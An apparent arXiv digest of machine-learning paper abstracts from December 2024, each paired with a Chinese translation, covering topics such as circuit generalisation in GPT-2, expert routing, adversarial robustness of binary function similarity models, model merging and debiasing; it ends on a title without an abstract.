Mechanistic interpretability aims to understand the inner workings of large neural networks by identifying circuits, or minimal subgraphs within the model that implement algorithms responsible for performing specific tasks. These circuits are typically discovered and analyzed using a narrowly defined prompt format. However, given the abilities of large language models (LLMs) to generalize across various prompt formats for the same task, it remains unclear how well these circuits generalize. For instance, it is unclear whether the models generalization results from reusing the same circuit components, the components behaving differently, or the use of entirely different components. In this paper, we investigate the generality of the indirect object identification (IOI) circuit in GPT-2 small, which is well-studied and believed to implement a simple, interpretable algorithm. We evaluate its performance on prompt variants that challenge the assumptions of this algorithm. Our findings reveal that the circuit generalizes surprisingly well, reusing all of its components and mechanisms while only adding additional input edges. Notably, the circuit generalizes even to prompt variants where the original algorithm should fail; we discover a mechanism that explains this which we term S2 Hacking. Our findings indicate that circuits within LLMs may be more flexible and general than previously recognized, underscoring the importance of studying circuit generalization to better understand the broader capabilities of these models.
Updated: 2024-12-05 14:16:57
标题: 机制可解释性中的自适应电路行为和泛化
摘要: 机制可解释性旨在通过识别模型内部的电路或最小子图,实现执行特定任务的算法,从而理解大型神经网络的内部运作。这些电路通常是使用严格定义的提示格式发现和分析的。然而,鉴于大型语言模型(LLMs)具有跨不同提示格式泛化的能力,目前仍不清楚这些电路的泛化效果如何。例如,尚不清楚模型的泛化结果是因为重用相同的电路组件,组件的行为不同,还是使用完全不同的组件。在本文中,我们调查了GPT-2 small中间接对象识别(IOI)电路的泛化性,该电路经过深入研究并被认为实现了一个简单、可解释的算法。我们评估了它在挑战该算法假设的提示变体上的表现。我们的发现显示,该电路的泛化效果出乎意料地好,重复使用了所有的组件和机制,只添加了额外的输入边缘。值得注意的是,该电路甚至可以泛化到原始算法应该失败的提示变体;我们发现了一个解释这一现象的机制,我们称之为S2黑客。我们的发现表明,LLMs内部的电路可能比以前认识到的更灵活和通用,强调了研究电路泛化的重要性,以更好地了解这些模型的更广泛能力。
更新时间: 2024-12-05 14:16:57
领域: cs.LG,cs.AI,cs.CL,I.2.7
Bench-CoE: a Framework for Collaboration of Experts from Benchmark
Large Language Models (LLMs) are key technologies driving intelligent systems to handle multiple tasks. To meet the demands of various tasks, an increasing number of LLMs-driven experts with diverse capabilities have been developed, accompanied by corresponding benchmarks to evaluate their performance. This paper proposes the Bench-CoE framework, which enables Collaboration of Experts (CoE) by effectively leveraging benchmark evaluations to achieve optimal performance across various tasks. Bench-CoE includes a set of expert models, a router for assigning tasks to corresponding experts, and a benchmark dataset for training the router. Moreover, we formulate Query-Level and Subject-Level approaches based on our framework, and analyze the merits and drawbacks of these two approaches. Finally, we conduct a series of experiments with vary data distributions on both language and multimodal tasks to validate that our proposed Bench-CoE outperforms any single model in terms of overall performance. We hope this method serves as a baseline for further research in this area. The code is available at \url{https://github.com/ZhangXJ199/Bench-CoE}.
Updated: 2024-12-05 14:03:41
标题: Bench-CoE:一个用于Benchmark专家协作的框架
摘要: 大型语言模型(LLMs)是推动智能系统处理多个任务的关键技术。为了满足各种任务的需求,越来越多具有不同能力的LLMs驱动专家已经开发出来,并伴随着相应的基准来评估它们的性能。本文提出了Bench-CoE框架,通过有效地利用基准评估来实现专家之间的协作,从而在各种任务中实现最佳性能。Bench-CoE包括一组专家模型,一个用于将任务分配给相应专家的路由器,以及一个用于训练路由器的基准数据集。此外,我们基于我们的框架制定了查询级和主题级方法,并分析了这两种方法的优缺点。最后,我们在语言和多模态任务上使用不同数据分布进行了一系列实验,验证了我们提出的Bench-CoE在整体性能方面优于任何单一模型。我们希望这种方法可以作为进一步研究的基准。代码可在\url{https://github.com/ZhangXJ199/Bench-CoE}获取。
更新时间: 2024-12-05 14:03:41
领域: cs.AI
An In-Depth Examination of Risk Assessment in Multi-Class Classification Algorithms
Advanced classification algorithms are being increasingly used in safety-critical applications like health-care, engineering, etc. In such applications, miss-classifications made by ML algorithms can result in substantial financial or health-related losses. To better anticipate and prepare for such losses, the algorithm user seeks an estimate for the probability that the algorithm miss-classifies a sample. We refer to this task as the risk-assessment. For a variety of models and datasets, we numerically analyze the performance of different methods in solving the risk-assessment problem. We consider two solution strategies: a) calibration techniques that calibrate the output probabilities of classification models to provide accurate probability outputs; and b) a novel approach based upon the prediction interval generation technique of conformal prediction. Our conformal prediction based approach is model and data-distribution agnostic, simple to implement, and provides reasonable results for a variety of use-cases. We compare the different methods on a broad variety of models and datasets.
Updated: 2024-12-05 14:03:16
标题: 多类分类算法中风险评估的深入研究
摘要: 先进的分类算法越来越多地被用于像医疗保健、工程等安全关键应用中。在这些应用中,机器学习算法的误分类可能导致重大的财务或健康损失。为了更好地预测和准备这些损失,算法用户寻求对算法误分类样本的概率进行估计。我们将这一任务称为风险评估。针对各种模型和数据集,我们在数值上分析了不同方法在解决风险评估问题时的性能。我们考虑了两种解决策略:a)校准技术,通过校准分类模型的输出概率来提供准确的概率输出;b)一种基于符合预测生成技术的新方法。我们的基于符合预测的方法对模型和数据分布不可知,易于实施,并为各种用例提供合理的结果。我们在各种模型和数据集上比较了不同方法。
更新时间: 2024-12-05 14:03:16
领域: cs.LG,cs.NA,math.NA
On the Lack of Robustness of Binary Function Similarity Systems
Binary function similarity, which often relies on learning-based algorithms to identify what functions in a pool are most similar to a given query function, is a sought-after topic in different communities, including machine learning, software engineering, and security. Its importance stems from the impact it has in facilitating several crucial tasks, from reverse engineering and malware analysis to automated vulnerability detection. Whereas recent work cast light around performance on this long-studied problem, the research landscape remains largely lackluster in understanding the resiliency of the state-of-the-art machine learning models against adversarial attacks. As security requires to reason about adversaries, in this work we assess the robustness of such models through a simple yet effective black-box greedy attack, which modifies the topology and the content of the control flow of the attacked functions. We demonstrate that this attack is successful in compromising all the models, achieving average attack success rates of 57.06% and 95.81% depending on the problem settings (targeted and untargeted attacks). Our findings are insightful: top performance on clean data does not necessarily relate to top robustness properties, which explicitly highlights performance-robustness trade-offs one should consider when deploying such models, calling for further research.
Updated: 2024-12-05 13:54:53
标题: 关于二进制函数相似性系统缺乏鲁棒性的研究
摘要: 二元函数相似性通常依赖于基于学习的算法来识别池中哪些函数与给定的查询函数最相似,这是不同社区中的一个备受追捧的话题,包括机器学习、软件工程和安全领域。它的重要性源于其在促进几项关键任务方面的影响,从逆向工程和恶意软件分析到自动化漏洞检测。尽管最近的研究在这个长期研究的问题上表现出一些成果,但研究领域在理解现有机器学习模型对抗对抗攻击的韧性方面仍然缺乏光彩。由于安全需要考虑对手的情况,本研究通过一种简单而有效的黑盒贪婪攻击评估了这些模型的鲁棒性,该攻击修改了被攻击函数的拓扑结构和控制流的内容。我们证明这种攻击能够成功地破坏所有模型,实现了平均攻击成功率分别为57.06%和95.81%,具体取决于问题设置(有针对性和非有针对性攻击)。我们的发现具有启发性:在干净数据上的最佳性能不一定与最佳鲁棒性属性相关,这明确突显了在部署这些模型时应考虑的性能-鲁棒性权衡,呼吁进一步研究。
更新时间: 2024-12-05 13:54:53
领域: cs.CR,cs.LG
When Stability meets Sufficiency: Informative Explanations that do not Overwhelm
Recent studies evaluating various criteria for explainable artificial intelligence (XAI) suggest that fidelity, stability, and comprehensibility are among the most important metrics considered by users of AI across a diverse collection of usage contexts. We consider these criteria as applied to feature-based attribution methods, which are amongst the most prevalent in XAI literature. Going beyond standard correlation, methods have been proposed that highlight what should be minimally sufficient to justify the classification of an input (viz. pertinent positives). While minimal sufficiency is an attractive property akin to comprehensibility, the resulting explanations are often too sparse for a human to understand and evaluate the local behavior of the model. To overcome these limitations, we incorporate the criteria of stability and fidelity and propose a novel method called Path-Sufficient Explanations Method (PSEM) that outputs a sequence of stable and sufficient explanations for a given input of strictly decreasing size (or value) -- from original input to a minimally sufficient explanation -- which can be thought to trace the local boundary of the model in a stable manner, thus providing better intuition about the local model behavior for the specific input. We validate these claims, both qualitatively and quantitatively, with experiments that show the benefit of PSEM across three modalities (image, tabular and text) as well as versus other path explanations. A user study depicts the strength of the method in communicating the local behavior, where (many) users are able to correctly determine the prediction made by a model.
Updated: 2024-12-05 13:50:59
标题: 当稳定性遇见充分性:不会使人不知所措的信息性解释
摘要: 最近的研究评估了可解释人工智能(XAI)的各种标准,表明忠实度、稳定性和可理解性是AI用户在各种使用情境中考虑的最重要的指标之一。我们将这些标准应用于基于特征的归因方法,这些方法在XAI文献中是最为普遍的。除了标准相关性之外,已经提出了一些方法,强调了应该最少需要什么来证明输入的分类(即相关正例)。虽然最小的充分性是一种类似于可理解性的吸引人的特性,但由此得出的解释通常对于人类来说过于稀疏,无法理解和评估模型的局部行为。为了克服这些局限性,我们结合了稳定性和忠实度的标准,并提出了一种名为路径充分解释方法(PSEM)的新方法,它为给定的输入输出了一个稳定且充分的解释序列,其大小(或值)严格递减——从原始输入到最小充分解释——可以认为是以稳定的方式追踪模型的局部边界,从而更好地理解特定输入的局部模型行为。我们通过实验证实了这些主张,无论是定性还是定量的,实验结果都显示了PSEM在三种模态(图像、表格和文本)以及与其他路径解释相比的好处。一项用户研究展示了该方法在传达局部行为方面的优势,其中(许多)用户能够正确确定模型的预测。
更新时间: 2024-12-05 13:50:59
领域: cs.LG,cs.AI
LossVal: Efficient Data Valuation for Neural Networks
Assessing the importance of individual training samples is a key challenge in machine learning. Traditional approaches retrain models with and without specific samples, which is computationally expensive and ignores dependencies between data points. We introduce LossVal, an efficient data valuation method that computes importance scores during neural network training by embedding a self-weighting mechanism into loss functions like cross-entropy and mean squared error. LossVal reduces computational costs, making it suitable for large datasets and practical applications. Experiments on classification and regression tasks across multiple datasets show that LossVal effectively identifies noisy samples and is able to distinguish helpful from harmful samples. We examine the gradient calculation of LossVal to highlight its advantages. The source code is available at: https://github.com/twibiral/LossVal
Updated: 2024-12-05 13:46:55
标题: LossVal:神经网络的高效数据估值
摘要: 评估个别训练样本的重要性是机器学习中的一个关键挑战。传统方法重新训练模型,有时会排除特定样本,这会消耗大量计算资源并忽略数据点之间的依赖关系。我们引入了LossVal,一种高效的数据估值方法,通过将自加权机制嵌入到交叉熵和均方误差等损失函数中,在神经网络训练过程中计算重要性分数。LossVal降低了计算成本,适用于大型数据集和实际应用。对多个数据集上的分类和回归任务进行的实验表明,LossVal有效地识别了噪声样本,并能够区分有益的和有害的样本。我们检查了LossVal的梯度计算,以突出其优势。源代码可在以下链接找到:https://github.com/twibiral/LossVal
更新时间: 2024-12-05 13:46:55
领域: cs.LG
Non-Asymptotic Bounds for Closed-Loop Identification of Unstable Nonlinear Stochastic Systems
We consider the problem of least squares parameter estimation from single-trajectory data for discrete-time, unstable, closed-loop nonlinear stochastic systems, with linearly parameterised uncertainty. Assuming a region of the state space produces informative data, and the system is sub-exponentially unstable, we establish non-asymptotic guarantees on the estimation error at times where the state trajectory evolves in this region. If the whole state space is informative, high probability guarantees on the error hold for all times. Examples are provided where our results are useful for analysis, but existing results are not.
Updated: 2024-12-05 13:45:35
标题: Unstable Nonlinear Stochastic Systems的闭环辨识的非渐近界限
摘要: 我们考虑从单轨迹数据进行最小二乘参数估计的问题,针对离散时间、不稳定、闭环非线性随机系统,其中存在线性参数化的不确定性。假设状态空间的某个区域产生了信息丰富的数据,并且系统是次指数不稳定的,我们在状态轨迹在此区域演变的时间点上建立了对估计误差的非渐近保证。如果整个状态空间都是信息丰富的,那么对误差的高概率保证将在所有时间点上成立。我们提供了一些示例,说明我们的结果在分析中的应用,而现有结果则不适用。
更新时间: 2024-12-05 13:45:35
领域: eess.SY,cs.LG,cs.SY,math.OC
Looking at Model Debiasing through the Lens of Anomaly Detection
It is widely recognized that deep neural networks are sensitive to bias in the data. This means that during training these models are likely to learn spurious correlations between data and labels, resulting in limited generalization abilities and low performance. In this context, model debiasing approaches can be devised aiming at reducing the model's dependency on such unwanted correlations, either leveraging the knowledge of bias information or not. In this work, we focus on the latter and more realistic scenario, showing the importance of accurately predicting the bias-conflicting and bias-aligned samples to obtain compelling performance in bias mitigation. On this ground, we propose to conceive the problem of model bias from an out-of-distribution perspective, introducing a new bias identification method based on anomaly detection. We claim that when data is mostly biased, bias-conflicting samples can be regarded as outliers with respect to the bias-aligned distribution in the feature space of a biased model, thus allowing for precisely detecting them with an anomaly detection method. Coupling the proposed bias identification approach with bias-conflicting data upsampling and augmentation in a two-step strategy, we reach state-of-the-art performance on synthetic and real benchmark datasets. Ultimately, our proposed approach shows that the data bias issue does not necessarily require complex debiasing methods, given that an accurate bias identification procedure is defined. Source code is available at https://github.com/Malga-Vision/MoDAD
Updated: 2024-12-05 13:37:51
标题: 透过异常检测的视角审视模型去偏见化
摘要: 广泛认为深度神经网络对数据中的偏差敏感。这意味着在训练过程中,这些模型很可能会学习数据与标签之间的虚假相关性,导致泛化能力有限和性能低下。在这种情况下,可以制定模型去偏置方法,旨在减少模型对这种不良相关性的依赖,无论是利用偏差信息的知识还是不利用。在这项工作中,我们专注于后者更现实的情况,展示了准确预测偏差冲突和偏差对齐样本以获得令人信服的偏差缓解性能的重要性。基于这一基础,我们提出从一种超出分布的角度来考虑模型偏差的问题,引入了一种基于异常检测的新偏差识别方法。我们声称当数据大多数是有偏差的时候,偏差冲突样本可以被视为相对于有偏模型特征空间中偏差对齐分布的异常值,从而允许使用异常检测方法精确地检测它们。将所提出的偏差识别方法与偏差冲突数据上采样和增强相结合,采用两步策略,在合成和真实基准数据集上实现了最先进的性能。最终,我们提出的方法表明数据偏差问题不一定需要复杂的去偏置方法,只要定义了准确的偏差识别程序即可。源代码可在https://github.com/Malga-Vision/MoDAD找到。
更新时间: 2024-12-05 13:37:51
领域: cs.LG,cs.CV,I.4; I.5
GV-Rep: A Large-Scale Dataset for Genetic Variant Representation Learning
Genetic variants (GVs) are defined as differences in the DNA sequences among individuals and play a crucial role in diagnosing and treating genetic diseases. The rapid decrease in next generation sequencing cost has led to an exponential increase in patient-level GV data. This growth poses a challenge for clinicians who must efficiently prioritize patient-specific GVs and integrate them with existing genomic databases to inform patient management. To addressing the interpretation of GVs, genomic foundation models (GFMs) have emerged. However, these models lack standardized performance assessments, leading to considerable variability in model evaluations. This poses the question: How effectively do deep learning methods classify unknown GVs and align them with clinically-verified GVs? We argue that representation learning, which transforms raw data into meaningful feature spaces, is an effective approach for addressing both indexing and classification challenges. We introduce a large-scale Genetic Variant dataset, named GV-Rep, featuring variable-length contexts and detailed annotations, designed for deep learning models to learn GV representations across various traits, diseases, tissue types, and experimental contexts. Our contributions are three-fold: (i) Construction of a comprehensive dataset with 7 million records, each labeled with characteristics of the corresponding variants, alongside additional data from 17,548 gene knockout tests across 1,107 cell types, 1,808 variant combinations, and 156 unique clinically verified GVs from real-world patients. (ii) Analysis of the structure and properties of the dataset. (iii) Experimentation of the dataset with pre-trained GFMs. The results show a significant gap between GFMs current capabilities and accurate GV representation. We hope this dataset will help advance genomic deep learning to bridge this gap.
Updated: 2024-12-05 13:30:16
标题: GV-Rep:用于基因变异表示学习的大规模数据集
摘要: 遗传变异(GVs)被定义为个体之间DNA序列的差异,并在诊断和治疗遗传疾病中发挥关键作用。下一代测序成本的急剧降低导致患者级别GV数据呈指数增长。这种增长对于必须有效地优先考虑特定患者GV并将其与现有基因组数据库整合以指导患者管理的临床医生构成挑战。为了解释GVs,基因组基础模型(GFMs)已经出现。然而,这些模型缺乏标准化的性能评估,导致模型评估中存在相当大的变异性。这引出一个问题:深度学习方法如何有效地对未知的GV进行分类,并将其与临床验证的GV对齐?我们认为,表示学习,将原始数据转化为有意义的特征空间,是解决索引和分类挑战的有效方法。我们引入了一个名为GV-Rep的大规模遗传变异数据集,其中包含可变长度的上下文和详细注释,旨在供深度学习模型学习跨各种特征、疾病、组织类型和实验背景的GV表示。我们的贡献有三个方面:(一)构建一个包含700万条记录的综合数据集,每个记录都标有相应变异特征的特征,以及来自1,107种细胞类型、1,808种变异组合和156种真实世界患者的156种唯一临床验证GV的额外数据。 (二)分析数据集的结构和属性。 (三)将数据集与预训练的GFMs进行实验。结果显示GFMs目前的能力与准确的GV表示之间存在显著差距。我们希望这个数据集将有助于推动基因组深度学习,以弥合这一差距。
更新时间: 2024-12-05 13:30:16
领域: cs.LG,q-bio.GN
MC-LLaVA: Multi-Concept Personalized Vision-Language Model
Current vision-language models (VLMs) show exceptional abilities across diverse tasks including visual question answering. To enhance user experience in practical applications, recent studies investigate VLM personalization to understand user-provided concepts. However, existing studies mainly focus on single-concept personalization, neglecting the existence and interplay of multiple concepts, which limits the real-world applicability of personalized VLMs. In this paper, we propose the first multi-concept personalization method named MC-LLaVA along with a high-quality multi-concept personalization dataset. Specifically, MC-LLaVA uses a joint training strategy incorporating multiple concepts in a single training step, allowing VLMs to perform accurately in multi-concept personalization. To reduce the cost of joint training, MC-LLaVA leverages visual token information for concept token initialization, yielding improved concept representation and accelerating joint training. To advance multi-concept personalization research, we further contribute a high-quality dataset. We carefully collect images from various movies that contain multiple characters and manually generate the multi-concept question-answer samples. Our dataset features diverse movie types and question-answer types. We conduct comprehensive qualitative and quantitative experiments to demonstrate that MC-LLaVA can achieve impressive multi-concept personalized responses, paving the way for VLMs to become better user-specific assistants. The code and dataset will be publicly available at https://github.com/arctanxarc/MC-LLaVA.
Updated: 2024-12-05 13:27:22
标题: MC-LLaVA: 多概念个性化视觉语言模型
摘要: 当前的视觉语言模型(VLMs)展现出在不同任务中的卓越能力,包括视觉问题回答。为了增强实际应用中用户体验,最近的研究探讨了VLM个性化以理解用户提供的概念。然而,现有研究主要集中在单一概念个性化上,忽视了多个概念的存在和相互作用,这限制了个性化VLM在现实世界中的适用性。在本文中,我们提出了第一个多概念个性化方法MC-LLaVA,以及一个高质量的多概念个性化数据集。具体来说,MC-LLaVA采用联合训练策略,在单个训练步骤中结合多个概念,使VLM能够准确地进行多概念个性化。为了降低联合训练的成本,MC-LLaVA利用视觉标记信息进行概念标记初始化,提高概念表示并加速联合训练。为了推动多概念个性化研究,我们进一步贡献了一个高质量的数据集。我们精心收集了包含多个角色的各种电影图像,并手动生成多概念问题-答案样本。我们的数据集包含多种电影类型和问题-答案类型。我们进行了全面的定性和定量实验,证明MC-LLaVA能够实现令人印象深刻的多概念个性化回应,为VLM成为更好的用户特定助手铺平了道路。代码和数据集将在https://github.com/arctanxarc/MC-LLaVA上公开提供。
更新时间: 2024-12-05 13:27:22
领域: cs.CV,cs.AI
Frequency-Adaptive Low-Latency Object Detection Using Events and Frames
Fusing Events and RGB images for object detection leverages the robustness of Event cameras in adverse environments and the rich semantic information provided by RGB cameras. However, two critical mismatches: low-latency Events \textit{vs.}~high-latency RGB frames; temporally sparse labels in training \textit{vs.}~continuous flow in inference, significantly hinder the high-frequency fusion-based object detection. To address these challenges, we propose the \textbf{F}requency-\textbf{A}daptive Low-Latency \textbf{O}bject \textbf{D}etector (FAOD). FAOD aligns low-frequency RGB frames with high-frequency Events through an Align Module, which reinforces cross-modal style and spatial proximity to address the Event-RGB Mismatch. We further propose a training strategy, Time Shift, which enforces the module to align the prediction from temporally shifted Event-RGB pairs and their original representation, that is, consistent with Event-aligned annotations. This strategy enables the network to use high-frequency Event data as the primary reference while treating low-frequency RGB images as supplementary information, retaining the low-latency nature of the Event stream toward high-frequency detection. Furthermore, we observe that these corrected Event-RGB pairs demonstrate better generalization from low training frequency to higher inference frequencies compared to using Event data alone. Extensive experiments on the PKU-DAVIS-SOD and DSEC-Detection datasets demonstrate that our FAOD achieves SOTA performance. Specifically, in the PKU-DAVIS-SOD Dataset, FAOD achieves 9.8 points improvement in terms of the mAP in fully paired Event-RGB data with only a quarter of the parameters compared to SODFormer, and even maintains robust performance (only a 3 points drop in mAP) under 80$\times$ Event-RGB frequency mismatch.
Updated: 2024-12-05 13:23:06
标题: 频率自适应低延迟物体检测使用事件和帧
摘要: 将事件和RGB图像融合用于目标检测,充分利用了事件相机在恶劣环境下的稳健性,以及RGB相机提供的丰富语义信息。然而,两个关键不匹配问题:低延迟事件与高延迟RGB帧;训练中时间稀疏标签与推断中连续流的时间不匹配,显著阻碍了基于高频率融合的目标检测。为了解决这些挑战,我们提出了频率自适应低延迟目标检测器(FAOD)。FAOD通过一个对齐模块将低频RGB帧与高频事件对齐,增强跨模态风格和空间接近性,以解决事件-RGB不匹配问题。我们进一步提出了一个训练策略,时间偏移,强制模块对齐从时间上偏移的事件-RGB对及其原始表示,即与事件对齐的注释一致。这种策略使网络能够将高频事件数据作为主要参考,同时将低频RGB图像作为补充信息,保持事件流的低延迟特性以实现高频率检测。此外,我们观察到,与仅使用事件数据相比,这些修正的事件-RGB对在从低训练频率到更高推断频率的泛化能力方面表现更好。在PKU-DAVIS-SOD和DSEC-Detection数据集上进行的大量实验表明,我们的FAOD实现了SOTA性能。具体而言,在PKU-DAVIS-SOD数据集中,与SODFormer相比,FAOD在完全配对的事件-RGB数据中的mAP方面提高了9.8个点,而且在80倍事件-RGB频率不匹配的情况下,仍然保持稳健性能(mAP仅下降3个点)。
更新时间: 2024-12-05 13:23:06
领域: cs.CV,cs.AI
Learning Semantic Association Rules from Internet of Things Data
Association Rule Mining (ARM) is the task of discovering commonalities in data in the form of logical implications. ARM is used in the Internet of Things (IoT) for different tasks including monitoring and decision-making. However, existing methods give limited consideration to IoT-specific requirements such as heterogeneity and volume. Furthermore, they do not utilize important static domain-specific description data about IoT systems, which is increasingly represented as knowledge graphs. In this paper, we propose a novel ARM pipeline for IoT data that utilizes both dynamic sensor data and static IoT system metadata. Furthermore, we propose an Autoencoder-based Neurosymbolic ARM method (Aerial) as part of the pipeline to address the high volume of IoT data and reduce the total number of rules that are resource-intensive to process. Aerial learns a neural representation of a given data and extracts association rules from this representation by exploiting the reconstruction (decoding) mechanism of an autoencoder. Extensive evaluations on 3 IoT datasets from 2 domains show that ARM on both static and dynamic IoT data results in more generically applicable rules while Aerial can learn a more concise set of high-quality association rules than the state-of-the-art with full coverage over the datasets.
Updated: 2024-12-05 13:22:28
标题: 学习从物联网数据中提取语义关联规则
摘要: 关联规则挖掘(ARM)是发现数据中逻辑蕴含的共同特点的任务。ARM在物联网(IoT)中用于监测和决策等不同任务。然而,现有方法对物联网特定要求(如异构性和数据量)考虑有限。此外,它们没有利用关于物联网系统的重要静态领域特定描述数据,这些数据越来越被表示为知识图。在本文中,我们提出了一个新颖的用于物联网数据的ARM流程,该流程利用了动态传感器数据和静态物联网系统元数据。此外,我们提出了一种基于自动编码器的神经符号ARM方法(Aerial)作为流程的一部分,以解决物联网数据的大量问题,并减少需要处理的资源密集型规则总数。Aerial通过利用自动编码器的重建(解码)机制,学习给定数据的神经表示,并从该表示中提取关联规则。对来自2个领域的3个物联网数据集进行的广泛评估表明,对静态和动态物联网数据进行ARM会产生更具普适性的规则,而Aerial可以学习到比最先进方法更简洁的高质量关联规则集,并且完全覆盖数据集。
更新时间: 2024-12-05 13:22:28
领域: cs.LG,cs.AI
MultiTASC++: A Continuously Adaptive Scheduler for Edge-Based Multi-Device Cascade Inference
Cascade systems, consisting of a lightweight model processing all samples and a heavier, high-accuracy model refining challenging samples, have become a widely-adopted distributed inference approach to achieving high accuracy and maintaining a low computational burden for mobile and IoT devices. As intelligent indoor environments, like smart homes, continue to expand, a new scenario emerges, the multi-device cascade. In this setting, multiple diverse devices simultaneously utilize a shared heavy model hosted on a server, often situated within or close to the consumer environment. This work introduces MultiTASC++, a continuously adaptive multi-tenancy-aware scheduler that dynamically controls the forwarding decision functions of devices to optimize system throughput while maintaining high accuracy and low latency. Through extensive experimentation in diverse device environments and with varying server-side models, we demonstrate the scheduler's efficacy in consistently maintaining a targeted satisfaction rate while providing the highest available accuracy across different device tiers and workloads of up to 100 devices. This demonstrates its scalability and efficiency in addressing the unique challenges of collaborative DNN inference in dynamic and diverse IoT environments.
Updated: 2024-12-05 13:19:34
标题: MultiTASC++:面向边缘多设备级联推理的连续自适应调度器
摘要: 级联系统由一个轻量级模型处理所有样本和一个更重、高精度的模型优化具有挑战性的样本组成,已经成为实现高准确性并保持移动和物联网设备低计算负担的广泛采用的分布式推理方法。随着智能室内环境(如智能家居)的不断扩展,出现了一个新的场景,即多设备级联。在这种情况下,多个不同的设备同时利用位于服务器上的共享重型模型,通常位于或靠近消费者环境中。本文介绍了MultiTASC++,这是一个持续自适应的多租户感知调度器,动态控制设备的转发决策函数,以优化系统吞吐量同时保持高准确性和低延迟。通过在不同设备环境和具有不同服务器端模型的广泛实验,我们展示了调度器在保持目标满意率的同时,在多达100个设备的不同设备层和工作负载中提供最高可用准确性的有效性。这表明它在解决动态和多样化物联网环境中协作DNN推理的独特挑战方面具有可扩展性和效率。
更新时间: 2024-12-05 13:19:34
领域: cs.LG,cs.DC
DeiSAM: Segment Anything with Deictic Prompting
Large-scale, pre-trained neural networks have demonstrated strong capabilities in various tasks, including zero-shot image segmentation. To identify concrete objects in complex scenes, humans instinctively rely on deictic descriptions in natural language, i.e., referring to something depending on the context such as "The object that is on the desk and behind the cup.". However, deep learning approaches cannot reliably interpret such deictic representations due to their lack of reasoning capabilities in complex scenarios. To remedy this issue, we propose DeiSAM -- a combination of large pre-trained neural networks with differentiable logic reasoners -- for deictic promptable segmentation. Given a complex, textual segmentation description, DeiSAM leverages Large Language Models (LLMs) to generate first-order logic rules and performs differentiable forward reasoning on generated scene graphs. Subsequently, DeiSAM segments objects by matching them to the logically inferred image regions. As part of our evaluation, we propose the Deictic Visual Genome (DeiVG) dataset, containing paired visual input and complex, deictic textual prompts. Our empirical results demonstrate that DeiSAM is a substantial improvement over purely data-driven baselines for deictic promptable segmentation.
Updated: 2024-12-05 13:15:34
标题: DeiSAM:使用指示提示进行分割任务
摘要: 大规模预训练神经网络在各种任务中展示了强大的能力,包括零样本图像分割。为了在复杂场景中识别具体对象,人类本能地依赖于自然语言中的指示性描述,即根据上下文指称某物,比如“桌子上且在杯子后面的物体”。然而,深度学习方法由于在复杂情境中缺乏推理能力,无法可靠地解释这种指示性表示。为了解决这个问题,我们提出了DeiSAM--将大规模预训练神经网络与可微逻辑推理器相结合,用于指示性提示分割。给定复杂的文本分割描述,DeiSAM利用大型语言模型(LLMs)生成一阶逻辑规则,并对生成的场景图进行可微向前推理。随后,DeiSAM通过将对象与逻辑推断的图像区域进行匹配来分割对象。作为评估的一部分,我们提出了Deictic Visual Genome (DeiVG)数据集,包含成对的视觉输入和复杂的指示性文本提示。我们的实证结果表明,DeiSAM相对于纯数据驱动的基线在指示性提示分割方面有了显著改进。
更新时间: 2024-12-05 13:15:34
领域: cs.LG,cs.AI,cs.CV
If You Can't Use Them, Recycle Them: Optimizing Merging at Scale Mitigates Performance Tradeoffs
Model merging has shown great promise at combining expert models, but the benefit of merging is unclear when merging ``generalist'' models trained on many tasks. We explore merging in the context of large ($\sim100$B) models, by \textit{recycling} checkpoints that exhibit tradeoffs among different tasks. Such checkpoints are often created in the process of developing a frontier model, and many suboptimal ones are usually discarded. Given a pool of model checkpoints obtained from different training runs (e.g., different stages, objectives, hyperparameters, and data mixtures), which naturally show tradeoffs across different language capabilities (e.g., instruction following vs. code generation), we investigate whether merging can recycle such suboptimal models into a Pareto-optimal one. Our optimization algorithm tunes the weight of each checkpoint in a linear combination, resulting in a Pareto-optimal models that outperforms both individual models and merge-based baselines. Further analysis shows that good merges tend to include almost all checkpoints with with non-zero weights, indicating that even seemingly bad initial checkpoints can contribute to good final merges.
Updated: 2024-12-05 13:12:51
标题: 如果您无法使用它们,则回收它们:优化大规模合并可减轻性能权衡
摘要: 模型合并在结合专家模型方面表现出极大的潜力,但当合并训练在许多任务上的“通用”模型时,合并的好处并不清楚。我们在大型(约100B)模型的背景下探讨了合并,通过“回收”展现出在不同任务之间存在权衡的检查点。这种检查点通常在开发前沿模型的过程中创建,通常会丢弃许多次优的检查点。考虑到从不同训练运行(例如,不同阶段、目标、超参数和数据混合)获得的模型检查点池,这些检查点自然地展示了在不同语言能力之间的权衡(例如,遵循指令 vs. 代码生成),我们调查合并是否可以将这种次优模型回收为一个帕累托最优模型。我们的优化算法调整每个检查点在线性组合中的权重,产生一个优于单个模型和基于合并的基线的帕累托最优模型。进一步的分析显示,好的合并倾向于包括几乎所有具有非零权重的检查点,表明即使看似差的初始检查点也可以对最终的好合并产生贡献。
更新时间: 2024-12-05 13:12:51
领域: cs.CL,cs.AI
Methodology for Online Estimation of Rheological Parameters in Polymer Melts Using Deep Learning and Microfluidics
Microfluidic devices are increasingly used in biological and chemical experiments due to their cost-effectiveness for rheological estimation in fluids. However, these devices often face challenges in terms of accuracy, size, and cost. This study presents a methodology, integrating deep learning, modeling and simulation to enhance the design of microfluidic systems, used to develop an innovative approach for viscosity measurement of polymer melts. We use synthetic data generated from the simulations to train a deep learning model, which then identifies rheological parameters of polymer melts from pressure drop and flow rate measurements in a microfluidic circuit, enabling online estimation of fluid properties. By improving the accuracy and flexibility of microfluidic rheological estimation, our methodology accelerates the design and testing of microfluidic devices, reducing reliance on physical prototypes, and offering significant contributions to the field.
Updated: 2024-12-05 13:11:04
标题: 使用深度学习和微流体学在线估计聚合物熔体流变参数的方法论
摘要: 微流体器件在生物和化学实验中越来越常用,因为它们在流体流变性能估计方面具有成本效益。然而,这些器件在精度、大小和成本方面经常面临挑战。本研究提出了一种方法,将深度学习、建模和仿真整合起来,以增强微流体系统的设计,用于开发一种创新的聚合物熔体粘度测量方法。我们使用从仿真中生成的合成数据来训练深度学习模型,该模型然后通过微流体电路中的压降和流量测量来识别聚合物熔体的流变参数,从而实现在线估计流体性质。通过提高微流体流变性能的精度和灵活性,我们的方法加速了微流体器件的设计和测试,减少了对物理样机的依赖,并对该领域做出了重要贡献。
更新时间: 2024-12-05 13:11:04
领域: physics.flu-dyn,cs.AI
Understanding Memorization in Generative Models via Sharpness in Probability Landscapes
